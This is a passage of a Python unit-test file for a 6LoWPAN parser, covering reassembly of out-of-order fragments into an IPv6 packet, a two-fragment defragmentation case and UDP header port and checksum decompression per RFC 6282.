fragment_5 = bytearray([
0xE5, 0x00, 0x31, 0x9F, 0x35, 0x15, 0xB3, 0x00, 0x54, 0xCC, 0x54,
0x01, 0xAA, 0x11, 0x44, 0x66, 0x4E, 0x92, 0xBB, 0x53, 0x1A, 0x80,
0x00, 0xFA, 0xA5, 0x0B, 0xC0, 0x00, 0x04, 0x4E, 0x92, 0xBB, 0x53,
0x11, 0x4C, 0x66, 0x4E, 0x92, 0xBB, 0x53, 0x1A, 0x44, 0x66, 0x77,
0x99, 0x15, 0xB3, 0x00, 0x54, 0xCC, 0x54, 0x01, 0xAA, 0x44, 0x54,
0x12, 0xa3, 0x53, 0x11, 0x44, 0x66, 0xFE, 0x92, 0xBB, 0x53, 0x1A,
0x44, 0x66, 0x77, 0x99, 0x1A, 0x92, 0xBB, 0x53, 0x11, 0x44, 0x66,
0x92, 0xBB, 0x53, 0x1A, 0x44, 0x66, 0x77, 0x99, 0x15, 0xB3, 0x00,
0x54, 0xCC, 0x54, 0x01, 0xAA, 0x11, 0x44, 0x66, 0x4E, 0x92, 0xBB,
0x53, 0x1A
])
fragment_6 = bytearray([
0xE5, 0x00, 0x31, 0x9F, 0x41, 0x80, 0x00, 0xFA, 0xA5, 0x0B, 0xC0,
0x00, 0x04, 0x4E, 0x92, 0x1B, 0x53, 0x11, 0x44, 0x66, 0x4E, 0x22,
0xBB, 0x53, 0x1A, 0x44, 0x67, 0x77, 0x99, 0x15, 0xB3, 0x00, 0x54,
0xCC, 0x54, 0x01, 0xAA, 0x44, 0x54, 0x12, 0xD3, 0x53, 0x11, 0x44,
0x66, 0x4E, 0x92, 0xBB, 0x53, 0x1A, 0x44, 0x66, 0x77, 0x99, 0x1A,
0x92, 0xBB, 0x53, 0x11, 0x44, 0x66, 0x92, 0xBB, 0x53, 0x1A, 0x44,
0x66, 0x77, 0x99, 0x15, 0xB3, 0x00, 0x54, 0xCC, 0x54, 0x01, 0xAA,
0x11, 0x44, 0x66, 0x4E, 0x92, 0xBB, 0x53, 0x1A, 0xC0, 0x00, 0xFA,
0x15, 0x0B, 0xC0, 0x00, 0x04, 0x4E, 0x92, 0xBB, 0x53, 0x11, 0x44,
0xCC, 0x4E
])
fragment_7 = bytearray([
0xE5, 0x00, 0x31, 0x9F, 0x4D, 0x92, 0xBB, 0x53, 0x1A, 0x44, 0x66,
0x77, 0x99, 0x15, 0xB3, 0x00, 0x54, 0xCC, 0x54, 0x01, 0xAA, 0x44,
0x54, 0x12, 0x43, 0x53, 0x11, 0x44, 0x66, 0x4E, 0x92, 0xBC, 0x53,
0x1A, 0x44, 0x66, 0x77, 0x99, 0x1A, 0x92, 0xBB, 0x53, 0x11, 0x44,
0x66, 0x92, 0xBB, 0x53, 0x1A, 0x44, 0x66, 0x77, 0x99, 0x15, 0xB3,
0x00, 0x54, 0xCC, 0x54, 0x01, 0xAA, 0x11, 0x44, 0x66, 0x4E, 0x92,
0xBA, 0x53, 0x1A, 0x60, 0x00, 0x00, 0x00, 0x00, 0x10, 0x3A, 0x64,
0xfe, 0x80, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x02, 0x00, 0x00,
0x11, 0x12, 0x13, 0x14, 0x15, 0xfe, 0x80, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00
])
fragment_8 = bytearray([
0xE5, 0x00, 0x31, 0x9F, 0x59, 0x02, 0x00, 0x1A, 0x2A, 0x3F, 0x09,
0xAB, 0x43, 0x60, 0x00, 0xF0, 0x00, 0x00, 0x10, 0x3A, 0x64, 0xfe,
0x80, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x02, 0x00, 0x00, 0x11,
0x12, 0x13, 0x14, 0x15, 0xfe, 0x80, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x02, 0x00, 0x1A, 0x2A, 0x3F, 0x09, 0xAB, 0x43, 0x80, 0x00,
0xFA, 0xA5, 0x0B, 0xC0, 0x00, 0x04, 0x4E, 0x92, 0xBB, 0x53, 0x11,
0x44, 0x66, 0x4E, 0x92, 0xBB, 0x53, 0x1A, 0x44, 0x66, 0x77, 0x99,
0x15, 0xB3, 0x00, 0x54, 0xCC, 0x54, 0x01, 0xAA, 0x44, 0x54, 0x12,
0x43, 0x53, 0x11, 0x44, 0x66, 0x4E, 0x92, 0xBC, 0x53, 0x1A, 0x44,
0x66, 0x77
])
fragment_9 = bytearray([
0xE5, 0x00, 0x31, 0x9F, 0x65, 0x99, 0x1A, 0x92, 0xBB, 0x53, 0x11,
0x44, 0x66, 0x92, 0xBB, 0x53, 0x1A, 0x44, 0x66, 0x77, 0x99, 0x15,
0xB3, 0x00, 0x54, 0xCC, 0x54, 0x01, 0xAA, 0x11, 0x44, 0x66, 0x4E,
0x92, 0xBB, 0x53, 0x1A, 0x80, 0x00, 0xFA, 0xA5, 0x0B, 0xC0, 0x00,
0x04, 0x4E, 0x92, 0xBB, 0x53, 0x11, 0x4C, 0x66, 0x4E, 0x92, 0xBB,
0x53, 0x1A, 0x44, 0x66, 0x77, 0x99, 0x15, 0xB3, 0x00, 0x54, 0xCC,
0x54, 0x01, 0xAA, 0x44, 0x54, 0x12, 0xa3, 0x53, 0x11, 0x44, 0x66,
0xFE, 0x92, 0xBB, 0x53, 0x1A, 0x44, 0x66, 0x77, 0x99, 0x1A, 0x92,
0xBB, 0x53, 0x11, 0x44, 0x66, 0x92, 0xBB, 0x53, 0x1A, 0x4D, 0x66,
0x77, 0x99
])
fragment_10 = bytearray([
0xE5, 0x00, 0x31, 0x9F, 0x71, 0x15, 0xB3, 0x00, 0x54, 0xCC, 0x54,
0x01, 0xAA, 0x11, 0x44, 0x66, 0x4E, 0x92, 0xBB, 0x53, 0x1A, 0x80,
0x00, 0xFA, 0xA5, 0x0B, 0xC0, 0x00, 0x04, 0x4E, 0x92, 0x1B, 0x53,
0x11, 0x44, 0x66, 0x4E, 0x22, 0xBB, 0x51, 0x1A, 0x44, 0x66, 0x77,
0x99, 0x15, 0xB3, 0x00, 0x54, 0xCC, 0x54, 0x01, 0xAA, 0x44, 0x54,
0x12, 0xD3, 0x53, 0x11, 0x44, 0x66, 0x4E, 0x92, 0xBB, 0x53, 0x1A,
0x44, 0x66, 0x77, 0x99, 0x1A, 0x92, 0xBB, 0x53, 0x11, 0x44, 0x66,
0x92, 0xBB, 0x53, 0x1A, 0x44, 0x66, 0x77, 0x99, 0x15, 0xB3, 0x00,
0x54, 0xCC, 0x54, 0x01, 0xAA, 0x11, 0x44, 0x66, 0x4E, 0x92, 0xBB,
0x53, 0x1A
])
fragment_11 = bytearray([
0xE5, 0x00, 0x31, 0x9F, 0x7D, 0xC0, 0x00, 0xFA, 0xA5, 0x0B, 0xC0,
0x00, 0x04, 0x4E, 0x92, 0xBB, 0x53, 0x11, 0x44, 0xCC, 0x4E, 0x92,
0xBB, 0x53, 0x1A, 0x44, 0x66, 0x77, 0x99, 0x15, 0xB3, 0x00, 0x54,
0xCC, 0x54, 0x01, 0xAA, 0x44, 0x54, 0x12, 0x4A, 0x53, 0x11, 0x44,
0x66, 0x4E, 0x92, 0xBC, 0x53, 0x1A, 0x44, 0x66, 0x77, 0x99, 0x1A,
0x92, 0xBB, 0x53, 0x11, 0x44, 0x66, 0x92, 0xBB, 0x53, 0x1A, 0x44,
0x66, 0x77, 0x99, 0x15, 0xB3, 0x00, 0x54, 0xCC, 0x54, 0x01, 0xAA,
0x11, 0x44, 0x66, 0x4E, 0x92, 0xBB, 0x53, 0x1A, 0x80, 0x00, 0xFA,
0xA5, 0x0B, 0xC0, 0x00, 0x04, 0x4E, 0x92, 0xBB, 0x53, 0x11, 0x44,
0x66, 0x4E
])
fragment_12 = bytearray([
0xE5, 0x00, 0x31, 0x9F, 0x89, 0x92, 0xBB, 0x53, 0x1A, 0x44, 0x66,
0x77, 0x99, 0x15, 0xB3, 0x00, 0x54, 0xCC, 0x54, 0x01, 0xAA, 0x44,
0x54, 0x12, 0x43, 0x53, 0x11, 0x44, 0x66, 0x4E, 0x92, 0xBB, 0x53,
0x3A, 0x44, 0x66, 0x77, 0x99, 0x1A, 0x92, 0xBB, 0x53, 0x11, 0x44,
0x66, 0x92, 0xBB, 0x53, 0x1A, 0x44, 0x66, 0x77, 0x99, 0x15, 0xB3,
0x00, 0x54, 0xCC, 0x54, 0x01, 0xAA, 0x11, 0x44, 0x66, 0x4E, 0x92,
0xBB, 0x53, 0x1A, 0x80, 0x00, 0xFA, 0xA5, 0x0B, 0xC0, 0x00, 0x04,
0x4E, 0x92, 0xBB, 0x53, 0x11, 0x4C, 0x66, 0x4E, 0x92, 0xBB, 0x53,
0x1A, 0x44, 0x66, 0x77, 0x99, 0x15, 0xB3, 0x00, 0x54, 0xCC, 0x54,
0x01, 0xAA
])
fragment_13 = bytearray([
0xE5, 0x00, 0x31, 0x9F, 0x95, 0x44, 0x54, 0x12, 0xa3, 0x53, 0x11,
0x44, 0x66, 0xFE, 0x92, 0xBB, 0x53, 0x1A, 0x44, 0x66, 0x77, 0x99,
0x1A, 0x92, 0xBB, 0x53, 0x11, 0x44, 0x66, 0x92, 0xBB, 0x53, 0x1A,
0x44, 0x66, 0x77, 0x99, 0x15, 0xB3, 0x00, 0x54, 0xCC, 0x54, 0x01,
0xAA, 0x11, 0x44, 0x66, 0x4E, 0x92, 0xBB, 0x53, 0x1A, 0x80, 0x00,
0xFA, 0xA5, 0x1B, 0xC0, 0x00, 0x04, 0x4E, 0x92, 0x1B, 0x53, 0x11,
0x44, 0x66, 0x4E, 0x22, 0xBB, 0x53, 0x1A, 0x44, 0x66, 0x77, 0x99,
0x15, 0xB3, 0x00, 0x54, 0xCC, 0x54, 0x01, 0xAA, 0x44, 0x54, 0x12,
0xD3, 0x53, 0x11, 0x44, 0x66
])
message_info = common.MessageInfo()
message_info.source_mac_address = common.MacAddress.from_eui64(
bytearray([0x00, 0x00, 0x00, 0x11, 0x12, 0x13, 0x14, 0x15]))
message_info.destination_mac_address = common.MacAddress.from_eui64(
bytearray([0x00, 0x00, 0x1A, 0x2A, 0x3F, 0x09, 0xAB, 0x43]))
parser = create_default_lowpan_parser(context_manager=None)
# WHEN
self.assertIsNone(parser.parse(io.BytesIO(fragment_4), message_info))
self.assertIsNone(parser.parse(io.BytesIO(fragment_2), message_info))
self.assertIsNone(parser.parse(io.BytesIO(fragment_3), message_info))
self.assertIsNone(parser.parse(io.BytesIO(fragment_13), message_info))
self.assertIsNone(parser.parse(io.BytesIO(fragment_5), message_info))
self.assertIsNone(parser.parse(io.BytesIO(fragment_6), message_info))
self.assertIsNone(parser.parse(io.BytesIO(fragment_7), message_info))
self.assertIsNone(parser.parse(io.BytesIO(fragment_8), message_info))
self.assertIsNone(parser.parse(io.BytesIO(fragment_9), message_info))
self.assertIsNone(parser.parse(io.BytesIO(fragment_10), message_info))
self.assertIsNone(parser.parse(io.BytesIO(fragment_11), message_info))
self.assertIsNone(parser.parse(io.BytesIO(fragment_12), message_info))
actual_ipv6_packet = parser.parse(io.BytesIO(fragment_1), message_info)
# THEN
ipv6_packet = bytearray([
0x60,
0x00,
0x00,
0x00,
0x04,
0xD8,
0x3A,
0x40,
0xfe,
0x80,
0x00,
0x00,
0x00,
0x00,
0x00,
0x00,
0x02,
0x00,
0x00,
0x11,
0x12,
0x13,
0x14,
0x15,
0xfe,
0x80,
0x00,
0x00,
0x00,
0x00,
0x00,
0x00,
0x02,
0x00,
0x1A,
0x2A,
0x3F,
0x09,
0xAB,
            0x43,  # /* 40 */
0x80,
0x00,
0xAB,
0x64,
0x0B,
0xC0,
0x00,
0x04,
0x4E,
0x92,
0xBB,
0x53,
0x11,
0x44,
0x66,
0x4E,
0x92,
0xBB,
0x53,
0x1A,
0x44,
0x66,
0x77,
0x99,
0x15,
0xB3,
0x00,
0x54,
0xCC,
0x54,
0x01,
0xAA,
0x44,
0x54,
0x12,
0x43,
0x53,
0x11,
0x44,
0x66,
0x4E,
0x92,
0xBB,
0x53,
0x1A,
0x44,
0x66,
0x77,
0x99,
0x1A,
0x92,
0xBB,
0x53,
0x11,
0x44,
0x66,
0x92,
0xBB,
0x53,
0x1A,
0x44,
0x66,
0x77,
0x99,
0x15,
0xB3,
0x00,
0x54,
0xCC,
0x54,
0x01,
0xAA,
0x11,
0x44,
0x66,
0x4E,
0x92,
0xBB,
0x53,
            0x1A,  # /* 120 */
0x80,
0x00,
0xFA,
0xA5,
0x0B,
0xC0,
0x00,
0x04,
0x4E,
0x92,
0xBB,
0x53,
0x11,
0x4C,
0x66,
0x4E,
0x92,
0xBB,
0x53,
0x1A,
0x44,
0x66,
0x77,
0x99,
0x15,
0xB3,
0x00,
0x54,
0xCC,
0x54,
0x01,
0xAA,
0x44,
0x54,
0x12,
0xa3,
0x53,
0x11,
0x44,
0x66,
0xFE,
0x92,
0xBB,
0x53,
0x1A,
0x44,
0x66,
0x77,
0x99,
0x1A,
0x92,
0xBB,
0x53,
0x11,
0x44,
0x66,
0x92,
0xBB,
0x53,
0x1A,
0x44,
0x66,
0x77,
0x99,
0x15,
0xB3,
0x00,
0x54,
0xCC,
0x54,
0x01,
0xAA,
0x11,
0x44,
0x66,
0x4E,
0x92,
0xBB,
0x53,
            0x1A,  # /* 200 */
0x80,
0x00,
0xFA,
0xA5,
0x0B,
0xC0,
0x00,
0x04,
0x4E,
0x92,
0x1B,
0x53,
0x11,
0x44,
0x66,
0x4E,
0x22,
0xBB,
0x53,
0x1A,
0x44,
0x66,
0x77,
0x99,
0x15,
0xB3,
0x00,
0x54,
0xCC,
0x54,
0x01,
0xAA,
0x44,
0x54,
0x12,
0xD3,
0x53,
0x11,
0x44,
0x66,
0x4E,
0x92,
0xBB,
0x53,
0x1A,
0x44,
0x66,
0x77,
0x99,
0x1A,
0x92,
0xBB,
0x53,
0x11,
0x44,
0x66,
0x92,
0xBB,
0x53,
0x1A,
0x44,
0x66,
0x77,
0x99,
0x15,
0xB3,
0x00,
0x54,
0xCC,
0x54,
0x01,
0xAA,
0x11,
0x44,
0x66,
0x4E,
0x92,
0xBB,
0x53,
            0x1A,  # /* 280 */
0xC0,
0x00,
0xFA,
0xA5,
0x0B,
0xC0,
0x00,
0x04,
0x4E,
0x92,
0xBB,
0x53,
0x11,
0x44,
0xCC,
0x4E,
0x92,
0xBB,
0x53,
0x1A,
0x44,
0x66,
0x77,
0x99,
0x15,
0xB3,
0x00,
0x54,
0xCC,
0x54,
0x01,
0xAA,
0x44,
0x54,
0x12,
0x43,
0x53,
0x11,
0x44,
0x66,
0x4E,
0x92,
0xBC,
0x53,
0x1A,
0x44,
0x66,
0x77,
0x99,
0x1A,
0x92,
0xBB,
0x53,
0x11,
0x44,
0x66,
0x92,
0xBB,
0x53,
0x1A,
0x44,
0x66,
0x77,
0x99,
0x15,
0xB3,
0x00,
0x54,
0xCC,
0x54,
0x01,
0xAA,
0x11,
0x44,
0x66,
0x4E,
0x92,
0xBB,
0x53,
            0x1A,  # /* 360 */
0x80,
0x00,
0xFA,
0xA5,
0x0B,
0xC0,
0x00,
0x04,
0x4E,
0x92,
0xBB,
0x53,
0x11,
0x44,
0x66,
0x4E,
0x92,
0xBB,
0x53,
0x1A,
0x44,
0x66,
0x77,
0x99,
0x15,
0xB3,
0x00,
0x54,
0xCC,
0x54,
0x01,
0xAA,
0x44,
0x54,
0x12,
0x43,
0x53,
0x11,
0x44,
0x66,
0x4E,
0x92,
0xBB,
0x53,
0x1A,
0x44,
0x66,
0x77,
0x99,
0x1A,
0x92,
0xBB,
0x53,
0x11,
0x44,
0x66,
0x92,
0xBB,
0x53,
0x1A,
0x44,
0x66,
0x77,
0x99,
0x15,
0xB3,
0x00,
0x54,
0xCC,
0x54,
0x01,
0xAA,
0x11,
0x44,
0x66,
0x4E,
0x92,
0xBB,
0x53,
0x1A,
0x80,
0x00,
0xFA,
0xA5,
0x0B,
0xC0,
0x00,
0x04,
0x4E,
0x92,
0xBB,
0x53,
0x11,
0x4C,
0x66,
0x4E,
0x92,
0xBB,
0x53,
0x1A,
0x44,
0x66,
0x77,
0x99,
0x15,
0xB3,
0x00,
0x54,
0xCC,
0x54,
0x01,
0xAA,
0x44,
0x54,
0x12,
0xa3,
0x53,
0x11,
0x44,
0x66,
0xFE,
0x92,
0xBB,
0x53,
0x1A,
0x44,
0x66,
0x77,
0x99,
0x1A,
0x92,
0xBB,
0x53,
0x11,
0x44,
0x66,
0x92,
0xBB,
0x53,
0x1A,
0x44,
0x66,
0x77,
0x99,
0x15,
0xB3,
0x00,
0x54,
0xCC,
0x54,
0x01,
0xAA,
0x11,
0x44,
0x66,
0x4E,
0x92,
0xBB,
0x53,
0x1A,
0x80,
0x00,
0xFA,
0xA5,
0x0B,
0xC0,
0x00,
0x04,
0x4E,
0x92,
0x1B,
0x53,
0x11,
0x44,
0x66,
0x4E,
0x22,
0xBB,
0x53,
0x1A,
0x44,
0x67,
0x77,
0x99,
0x15,
0xB3,
0x00,
0x54,
0xCC,
0x54,
0x01,
0xAA,
0x44,
0x54,
0x12,
0xD3,
0x53,
0x11,
0x44,
0x66,
0x4E,
0x92,
0xBB,
0x53,
0x1A,
0x44,
0x66,
0x77,
0x99,
0x1A,
0x92,
0xBB,
0x53,
0x11,
0x44,
0x66,
0x92,
0xBB,
0x53,
0x1A,
0x44,
0x66,
0x77,
0x99,
0x15,
0xB3,
0x00,
0x54,
0xCC,
0x54,
0x01,
0xAA,
0x11,
0x44,
0x66,
0x4E,
0x92,
0xBB,
0x53,
0x1A,
0xC0,
0x00,
0xFA,
0x15,
0x0B,
0xC0,
0x00,
0x04,
0x4E,
0x92,
0xBB,
0x53,
0x11,
0x44,
0xCC,
0x4E,
0x92,
0xBB,
0x53,
0x1A,
0x44,
0x66,
0x77,
0x99,
0x15,
0xB3,
0x00,
0x54,
0xCC,
0x54,
0x01,
0xAA,
0x44,
0x54,
0x12,
0x43,
0x53,
0x11,
0x44,
0x66,
0x4E,
0x92,
0xBC,
0x53,
0x1A,
0x44,
0x66,
0x77,
0x99,
0x1A,
0x92,
0xBB,
0x53,
0x11,
0x44,
0x66,
0x92,
0xBB,
0x53,
0x1A,
0x44,
0x66,
0x77,
0x99,
0x15,
0xB3,
0x00,
0x54,
0xCC,
0x54,
0x01,
0xAA,
0x11,
0x44,
0x66,
0x4E,
0x92,
0xBA,
0x53,
0x1A,
0x60,
0x00,
0x00,
0x00,
0x00,
0x10,
0x3A,
0x64,
0xfe,
0x80,
0x00,
0x00,
0x00,
0x00,
0x00,
0x00,
0x02,
0x00,
0x00,
0x11,
0x12,
0x13,
0x14,
0x15,
0xfe,
0x80,
0x00,
0x00,
0x00,
0x00,
0x00,
0x00,
0x02,
0x00,
0x1A,
0x2A,
0x3F,
0x09,
0xAB,
            0x43,  # /* 720 */
0x60,
0x00,
0xF0,
0x00,
0x00,
0x10,
0x3A,
0x64,
0xfe,
0x80,
0x00,
0x00,
0x00,
0x00,
0x00,
0x00,
0x02,
0x00,
0x00,
0x11,
0x12,
0x13,
0x14,
0x15,
0xfe,
0x80,
0x00,
0x00,
0x00,
0x00,
0x00,
0x00,
0x02,
0x00,
0x1A,
0x2A,
0x3F,
0x09,
0xAB,
0x43,
0x80,
0x00,
0xFA,
0xA5,
0x0B,
0xC0,
0x00,
0x04,
0x4E,
0x92,
0xBB,
0x53,
0x11,
0x44,
0x66,
0x4E,
0x92,
0xBB,
0x53,
0x1A,
0x44,
0x66,
0x77,
0x99,
0x15,
0xB3,
0x00,
0x54,
0xCC,
0x54,
0x01,
0xAA,
0x44,
0x54,
0x12,
0x43,
0x53,
0x11,
0x44,
0x66,
0x4E,
0x92,
0xBC,
0x53,
0x1A,
0x44,
0x66,
0x77,
0x99,
0x1A,
0x92,
0xBB,
0x53,
0x11,
0x44,
0x66,
0x92,
0xBB,
0x53,
0x1A,
0x44,
0x66,
0x77,
0x99,
0x15,
0xB3,
0x00,
0x54,
0xCC,
0x54,
0x01,
0xAA,
0x11,
0x44,
0x66,
0x4E,
0x92,
0xBB,
0x53,
0x1A,
0x80,
0x00,
0xFA,
0xA5,
0x0B,
0xC0,
0x00,
0x04,
0x4E,
0x92,
0xBB,
0x53,
0x11,
0x4C,
0x66,
0x4E,
0x92,
0xBB,
0x53,
0x1A,
0x44,
0x66,
0x77,
0x99,
0x15,
0xB3,
0x00,
0x54,
0xCC,
0x54,
0x01,
0xAA,
0x44,
0x54,
0x12,
0xa3,
0x53,
0x11,
0x44,
0x66,
0xFE,
0x92,
0xBB,
0x53,
0x1A,
0x44,
0x66,
0x77,
0x99,
0x1A,
0x92,
0xBB,
0x53,
0x11,
0x44,
0x66,
0x92,
0xBB,
0x53,
0x1A,
0x4D,
0x66,
0x77,
0x99,
0x15,
0xB3,
0x00,
0x54,
0xCC,
0x54,
0x01,
0xAA,
0x11,
0x44,
0x66,
0x4E,
0x92,
0xBB,
0x53,
0x1A,
0x80,
0x00,
0xFA,
0xA5,
0x0B,
0xC0,
0x00,
0x04,
0x4E,
0x92,
0x1B,
0x53,
0x11,
0x44,
0x66,
0x4E,
0x22,
0xBB,
0x51,
0x1A,
0x44,
0x66,
0x77,
0x99,
0x15,
0xB3,
0x00,
0x54,
0xCC,
0x54,
0x01,
0xAA,
0x44,
0x54,
0x12,
0xD3,
0x53,
0x11,
0x44,
0x66,
0x4E,
0x92,
0xBB,
0x53,
0x1A,
0x44,
0x66,
0x77,
0x99,
0x1A,
0x92,
0xBB,
0x53,
0x11,
0x44,
0x66,
0x92,
0xBB,
0x53,
0x1A,
0x44,
0x66,
0x77,
0x99,
0x15,
0xB3,
0x00,
0x54,
0xCC,
0x54,
0x01,
0xAA,
0x11,
0x44,
0x66,
0x4E,
0x92,
0xBB,
0x53,
0x1A,
0xC0,
0x00,
0xFA,
0xA5,
0x0B,
0xC0,
0x00,
0x04,
0x4E,
0x92,
0xBB,
0x53,
0x11,
0x44,
0xCC,
0x4E,
0x92,
0xBB,
0x53,
0x1A,
0x44,
0x66,
0x77,
0x99,
0x15,
0xB3,
0x00,
0x54,
0xCC,
0x54,
0x01,
0xAA,
0x44,
0x54,
0x12,
0x4A,
0x53,
0x11,
0x44,
0x66,
0x4E,
0x92,
0xBC,
0x53,
0x1A,
0x44,
0x66,
0x77,
0x99,
0x1A,
0x92,
0xBB,
0x53,
0x11,
0x44,
0x66,
0x92,
0xBB,
0x53,
0x1A,
0x44,
0x66,
0x77,
0x99,
0x15,
0xB3,
0x00,
0x54,
0xCC,
0x54,
0x01,
0xAA,
0x11,
0x44,
0x66,
0x4E,
0x92,
0xBB,
0x53,
            0x1A,  # /* 1080 */
0x80,
0x00,
0xFA,
0xA5,
0x0B,
0xC0,
0x00,
0x04,
0x4E,
0x92,
0xBB,
0x53,
0x11,
0x44,
0x66,
0x4E,
0x92,
0xBB,
0x53,
0x1A,
0x44,
0x66,
0x77,
0x99,
0x15,
0xB3,
0x00,
0x54,
0xCC,
0x54,
0x01,
0xAA,
0x44,
0x54,
0x12,
0x43,
0x53,
0x11,
0x44,
0x66,
0x4E,
0x92,
0xBB,
0x53,
0x3A,
0x44,
0x66,
0x77,
0x99,
0x1A,
0x92,
0xBB,
0x53,
0x11,
0x44,
0x66,
0x92,
0xBB,
0x53,
0x1A,
0x44,
0x66,
0x77,
0x99,
0x15,
0xB3,
0x00,
0x54,
0xCC,
0x54,
0x01,
0xAA,
0x11,
0x44,
0x66,
0x4E,
0x92,
0xBB,
0x53,
0x1A,
0x80,
0x00,
0xFA,
0xA5,
0x0B,
0xC0,
0x00,
0x04,
0x4E,
0x92,
0xBB,
0x53,
0x11,
0x4C,
0x66,
0x4E,
0x92,
0xBB,
0x53,
0x1A,
0x44,
0x66,
0x77,
0x99,
0x15,
0xB3,
0x00,
0x54,
0xCC,
0x54,
0x01,
0xAA,
0x44,
0x54,
0x12,
0xa3,
0x53,
0x11,
0x44,
0x66,
0xFE,
0x92,
0xBB,
0x53,
0x1A,
0x44,
0x66,
0x77,
0x99,
0x1A,
0x92,
0xBB,
0x53,
0x11,
0x44,
0x66,
0x92,
0xBB,
0x53,
0x1A,
0x44,
0x66,
0x77,
0x99,
0x15,
0xB3,
0x00,
0x54,
0xCC,
0x54,
0x01,
0xAA,
0x11,
0x44,
0x66,
0x4E,
0x92,
0xBB,
0x53,
0x1A,
0x80,
0x00,
0xFA,
0xA5,
0x1B,
0xC0,
0x00,
0x04,
0x4E,
0x92,
0x1B,
0x53,
0x11,
0x44,
0x66,
0x4E,
0x22,
0xBB,
0x53,
0x1A,
0x44,
0x66,
0x77,
0x99,
0x15,
0xB3,
0x00,
0x54,
0xCC,
0x54,
0x01,
0xAA,
0x44,
0x54,
0x12,
0xD3,
0x53,
0x11,
0x44,
0x66
])
self.assertEqual(ipv6_packet, actual_ipv6_packet.to_bytes())
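    # A minimal two-fragment case: FRAG1 (0xC0 0x38 -> size 56, tag 0x1234)
    # followed by FRAGN at offset 0x06 (48 octets); the second fragment
    # completes the 56-byte IPv6 packet.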
def test_should_defragment_IPv6_packet_when_parse_method_called_with_fragments(
self):
# GIVEN
message_info = common.MessageInfo()
message_info.source_mac_address = common.MacAddress.from_eui64(
bytearray([0x00, 0x00, 0x00, 0x11, 0x12, 0x13, 0x14, 0x15]))
message_info.destination_mac_address = common.MacAddress.from_eui64(
bytearray([0x00, 0x00, 0x1A, 0x2A, 0x3F, 0x09, 0xAB, 0x43]))
fragment_1 = bytearray([
0xC0, 0x38, 0x12, 0x34, 0x7A, 0x33, 0x3A, 0x80, 0x00, 0x1A, 0x33,
0x0B, 0xC0, 0x00, 0x04
])
fragment_2 = bytearray([
0xE0, 0x38, 0x12, 0x34, 0x06, 0x4E, 0x92, 0xBB, 0x53, 0x11, 0x12,
0x13, 0x14
])
parser = create_default_lowpan_parser(None)
# WHEN
self.assertIsNone(
parser.parse(io.BytesIO(fragment_1), message_info=message_info))
actual_ipv6_packet = parser.parse(io.BytesIO(fragment_2),
message_info=message_info)
# THEN
ipv6_packet = bytearray([
0x60, 0x00, 0x00, 0x00, 0x00, 0x10, 0x3A, 0x40, 0xfe, 0x80, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x02, 0x00, 0x00, 0x11, 0x12, 0x13,
0x14, 0x15, 0xfe, 0x80, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x02,
0x00, 0x1A, 0x2A, 0x3F, 0x09, 0xAB, 0x43, 0x80, 0x00, 0x1A, 0x33,
0x0B, 0xC0, 0x00, 0x04, 0x4E, 0x92, 0xBB, 0x53, 0x11, 0x12, 0x13,
0x14
])
self.assertEqual(ipv6_packet, actual_ipv6_packet.to_bytes())
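# LOWPAN_NHC UDP compression (RFC 6282): the P field selects how the ports are
# carried (both 16 bits inline, one port compressed against 0xF0xx, or both as
# 4-bit nibbles against 0xF0Bx), and the C bit controls whether the checksum is
# carried inline or elided.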
class TestLowpanUdpHeaderFactory(unittest.TestCase):
def test_should_parse_udp_datagram_ports_when_decompress_udp_ports_method_called_with_udphc_p_eq_0(
self):
# GIVEN
factory = lowpan.LowpanUdpHeaderFactory()
p = factory.UDP_HC_P_BOTH_FULL
udphc = lowpan.LowpanUDPHC(any_c(), p)
src_port = any_src_port()
dst_port = any_dst_port()
data_bytes = struct.pack(">H", src_port) + struct.pack(">H", dst_port)
# WHEN
actual_src_port, actual_dst_port = factory._decompress_udp_ports(
udphc, io.BytesIO(data_bytes))
# THEN
self.assertEqual(src_port, actual_src_port)
self.assertEqual(dst_port, actual_dst_port)
self.assertEqual(0, p)
def test_should_parse_udp_datagram_ports_when_decompress_udp_ports_method_called_with_udphc_p_eq_1(
self):
# GIVEN
factory = lowpan.LowpanUdpHeaderFactory()
p = factory.UDP_HC_P_DST_COMPR
udphc = lowpan.LowpanUDPHC(any_c(), p)
src_port = any_src_port()
dst_port = any_compressable_dst_port()
data_bytes = struct.pack(">H", src_port) + bytearray(
[struct.pack(">H", dst_port)[1]])
# WHEN
actual_src_port, actual_dst_port = factory._decompress_udp_ports(
udphc, io.BytesIO(data_bytes))
# THEN
self.assertEqual(1, p)
self.assertEqual(src_port, actual_src_port)
self.assertEqual(dst_port, actual_dst_port)
def test_should_parse_udp_datagram_ports_when_decompress_udp_ports_method_called_with_udphc_p_eq_2(
self):
# GIVEN
factory = lowpan.LowpanUdpHeaderFactory()
p = factory.UDP_HC_P_SRC_COMPR
udphc = lowpan.LowpanUDPHC(any_c(), p)
src_port = any_compressable_src_port()
dst_port = any_dst_port()
data_bytes = bytearray([struct.pack(">H", src_port)[1]]) + struct.pack(
">H", dst_port)
# WHEN
actual_src_port, actual_dst_port = factory._decompress_udp_ports(
udphc, io.BytesIO(data_bytes))
# THEN
self.assertEqual(2, p)
self.assertEqual(src_port, actual_src_port)
self.assertEqual(dst_port, actual_dst_port)
def test_should_parse_udp_datagram_ports_when_decompress_udp_ports_method_called_with_udphc_p_eq_3(
self):
# GIVEN
factory = lowpan.LowpanUdpHeaderFactory()
p = factory.UDP_HC_P_BOTH_COMPR
udphc = lowpan.LowpanUDPHC(any_c(), p)
src_port = any_nibble_src_port()
dst_port = any_nibble_dst_port()
data_bytes = bytearray([((src_port & 0x0F) << 4) | (dst_port & 0x0F)])
# WHEN
actual_src_port, actual_dst_port = factory._decompress_udp_ports(
udphc, io.BytesIO(data_bytes))
# THEN
self.assertEqual(3, p)
self.assertEqual(src_port, actual_src_port)
self.assertEqual(dst_port, actual_dst_port)
def test_should_parse_udp_datagram_checksum_when_decompress_udp_checksum_called_with_udphc_c_eq_0(
self):
# GIVEN
factory = lowpan.LowpanUdpHeaderFactory()
c = factory.UDP_HC_C_INLINE
udphc = lowpan.LowpanUDPHC(c, any_p())
checksum = any_checksum()
data_bytes = struct.pack(">H", checksum)
# WHEN
actual_checksum = factory._decompress_udp_checksum(
